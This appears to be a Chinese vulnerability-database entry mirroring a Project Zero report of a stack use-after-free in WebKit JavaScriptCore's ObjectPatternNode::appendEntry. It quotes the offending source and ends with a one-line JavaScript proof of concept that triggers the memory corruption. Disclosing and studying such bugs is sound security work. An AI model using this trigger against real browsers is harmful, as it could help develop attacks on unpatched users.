WebKit JSC - 'ObjectPatternNode::appendEntry' Stack Use-After-Free

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1068543 漏洞类型
发布时间 2017-07-25 更新时间 2017-07-25
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/42377
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1256

Here's a snippet of ObjectPatternNode::appendEntry.

void appendEntry(const JSTokenLocation&, ExpressionNode* propertyExpression, DestructuringPatternNode* pattern, ExpressionNode* defaultValue, BindingType bindingType)
{
    m_targetPatterns.append(Entry{ Identifier(), propertyExpression, false, pattern, defaultValue, bindingType });
}

Here's the definition of Entry.

struct Entry {
    const Identifier& propertyName;
    ExpressionNode* propertyExpression;
    bool wasString;
    DestructuringPatternNode* pattern;
    ExpressionNode* defaultValue;
    BindingType bindingType;
};

The Identifier object created by "Identifier()" is in the stack. So it will get freed in the end of the appendEntry method.

PoC:

var {[a]: b, ...[]} = {};